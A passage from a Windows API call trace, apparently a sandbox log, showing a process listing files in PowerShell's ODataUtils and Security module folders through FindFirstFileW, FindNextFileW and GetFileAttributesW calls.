ftCreationTime.dwLowDateTime=0x9abb71ce, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0x9abb71ce, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0x9abb71ce, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x2e5a, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.ODataUtilsStrings.psd1", cAlternateFileName="")) returned 1 [0177.120] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de070 | out: lpFindFileData=0x1b7de070*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0177.120] FindClose (in: hFindFile=0x1a592010 | out: hFindFile=0x1a592010) returned 1 [0177.120] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de2d0) returned 1 [0177.121] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de290) returned 1 [0177.121] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\en-US", nBufferLength=0x105, lpBuffer=0x1b7ddf70, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\en-US", lpFilePart=0x0) returned 0x58 [0177.121] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de3b0) returned 1 [0177.121] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\en-US" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.odatautils\\en-us"), fInfoLevelId=0x0, lpFileInformation=0x1b7de490 | out: lpFileInformation=0x1b7de490*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xbe8d4b97, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0177.121] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de370) returned 1 [0177.121] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de3e0) returned 1 [0177.121] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\en-US", nBufferLength=0x105, lpBuffer=0x1b7dded0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\en-US", lpFilePart=0x0) returned 0x58 [0177.121] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\en-US\\", nBufferLength=0x105, lpBuffer=0x1b7dde70, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\en-US\\", lpFilePart=0x0) returned 0x59 [0177.121] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\en-US\\*", lpFindFileData=0x1b7de080 | out: lpFindFileData=0x1b7de080*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xbe8d4b97, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a592790 [0177.121] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de0d0 | out: lpFindFileData=0x1b7de0d0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xbe8d4b97, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0177.122] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de0d0 | out: lpFindFileData=0x1b7de0d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9abb71ce, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0x9abb71ce, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0x9abb71ce, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x2e5a, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.ODataUtilsStrings.psd1", cAlternateFileName="")) returned 1 [0177.122] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de0d0 | out: lpFindFileData=0x1b7de0d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9abb71ce, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0x9abb71ce, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0x9abb71ce, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x2e5a, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.ODataUtilsStrings.psd1", cAlternateFileName="")) returned 0 [0177.122] FindClose (in: hFindFile=0x1a592790 | out: hFindFile=0x1a592790) returned 1 [0177.122] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de330) returned 1 [0177.122] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de2f0) returned 1 [0177.122] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\en-US\\en-US.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.odatautils\\en-us\\en-us.psd1")) returned 0xffffffff [0177.122] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\en-US\\en-US.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.odatautils\\en-us\\en-us.psm1")) returned 0xffffffff [0177.122] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\en-US\\en-US.cdxml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.odatautils\\en-us\\en-us.cdxml")) returned 0xffffffff [0177.122] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\en-US\\en-US.xaml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.odatautils\\en-us\\en-us.xaml")) returned 0xffffffff [0177.123] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\en-US\\en-US.dll" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.odatautils\\en-us\\en-us.dll")) returned 0xffffffff [0177.123] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils", nBufferLength=0x105, lpBuffer=0x1b7de100, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils", lpFilePart=0x0) returned 0x52 [0177.123] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de540) returned 1 [0177.123] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.odatautils"), fInfoLevelId=0x0, lpFileInformation=0x1b7de620 | out: lpFileInformation=0x1b7de620*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0177.123] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de500) returned 1 [0177.123] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de570) returned 1 [0177.123] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils", nBufferLength=0x105, lpBuffer=0x1b7de060, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils", lpFilePart=0x0) returned 0x52 [0177.123] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\", nBufferLength=0x105, lpBuffer=0x1b7de000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\", lpFilePart=0x0) returned 0x53 [0177.123] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\*", lpFindFileData=0x1b7de210 | out: lpFindFileData=0x1b7de210*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5928b0 [0177.123] FindNextFileW (in: hFindFile=0x1a5928b0, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0177.124] FindNextFileW (in: hFindFile=0x1a5928b0, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xbe8d4b97, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0177.124] FindNextFileW (in: hFindFile=0x1a5928b0, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f9f05ad, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f9f05ad, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f9f05ad, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x29c8e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.ODataAdapter.ps1", cAlternateFileName="")) returned 1 [0177.124] FindNextFileW (in: hFindFile=0x1a5928b0, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3d455a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3d455a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3d455a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x6194, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.ODataUtils.psd1", cAlternateFileName="")) returned 1 [0177.124] FindNextFileW (in: hFindFile=0x1a5928b0, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3d455a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3d455a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3d455a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x47a8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.ODataUtils.psm1", cAlternateFileName="")) returned 1 [0177.124] FindNextFileW (in: hFindFile=0x1a5928b0, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f9f05ad, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f9f05ad, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f9f05ad, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xcb3c, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.ODataUtilsHelper.ps1", cAlternateFileName="")) returned 1 [0177.124] FindNextFileW (in: hFindFile=0x1a5928b0, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3d455a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3d455a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3d455a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1fa9f, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.ODataV4Adapter.ps1", cAlternateFileName="")) returned 1 [0177.125] FindNextFileW (in: hFindFile=0x1a5928b0, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3d455a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3d455a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3d455a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1fa9f, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.ODataV4Adapter.ps1", cAlternateFileName="")) returned 0 [0177.125] FindClose (in: hFindFile=0x1a5928b0 | out: hFindFile=0x1a5928b0) returned 1 [0177.125] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de4c0) returned 1 [0177.125] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de480) returned 1 [0177.125] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\Microsoft.PowerShell.ODataUtils.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.odatautils\\microsoft.powershell.odatautils.psd1")) returned 0x20 [0177.127] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de510) returned 1 [0177.127] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Security", nBufferLength=0x105, lpBuffer=0x1b7de000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Security", lpFilePart=0x0) returned 0x50 [0177.127] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Security\\", nBufferLength=0x105, lpBuffer=0x1b7ddfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Security\\", lpFilePart=0x0) returned 0x51 [0177.127] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Security\\*", lpFindFileData=0x1b7de1b0 | out: lpFindFileData=0x1b7de1b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a592790 [0177.127] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0177.127] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x296, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Security.psd1", cAlternateFileName="")) returned 1 [0177.128] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x296, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Security.psd1", cAlternateFileName="")) returned 0 [0177.128] FindClose (in: hFindFile=0x1a592790 | out: hFindFile=0x1a592790) returned 1 [0177.128] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de460) returned 1 [0177.128] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de420) returned 1 [0177.128] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de510) returned 1 [0177.128] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Security", nBufferLength=0x105, lpBuffer=0x1b7de000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Security", lpFilePart=0x0) returned 0x50 [0177.166] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Security\\", nBufferLength=0x105, lpBuffer=0x1b7ddfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Security\\", lpFilePart=0x0) returned 0x51 [0177.166] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Security\\*", lpFindFileData=0x1b7de1b0 | out: lpFindFileData=0x1b7de1b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a592010 [0177.167] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0177.167] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x296, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Security.psd1", cAlternateFileName="")) returned 1 [0177.167] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0177.167] FindClose (in: hFindFile=0x1a592010 | out: hFindFile=0x1a592010) returned 1 [0177.167] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de460) returned 1 [0177.167] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de420) returned 1 [0177.167] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Security", nBufferLength=0x105, lpBuffer=0x1b7de100, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Security", lpFilePart=0x0) returned 0x50 [0177.168] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de540) returned 1 [0177.168] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Security" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.security"), fInfoLevelId=0x0, lpFileInformation=0x1b7de620 | out: lpFileInformation=0x1b7de620*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0177.168] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de500) returned 1 [0177.168] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de570) returned 1 [0177.168] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Security", nBufferLength=0x105, lpBuffer=0x1b7de060, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Security", lpFilePart=0x0) returned 0x50 [0177.168] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Security\\", nBufferLength=0x105, lpBuffer=0x1b7de000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Security\\", lpFilePart=0x0) returned 0x51 [0177.168] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Security\\*", lpFindFileData=0x1b7de210 | out: lpFindFileData=0x1b7de210*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a592790 [0177.168] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0177.169] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x296, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Security.psd1", cAlternateFileName="")) returned 1 [0177.169] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x296, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Security.psd1", cAlternateFileName="")) returned 0 [0177.169] FindClose (in: hFindFile=0x1a592790 | out: hFindFile=0x1a592790) returned 1 [0177.169] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de4c0) returned 1 [0177.169] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de480) returned 1 [0177.169] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Security\\Microsoft.PowerShell.Security.psd1" (normalized: 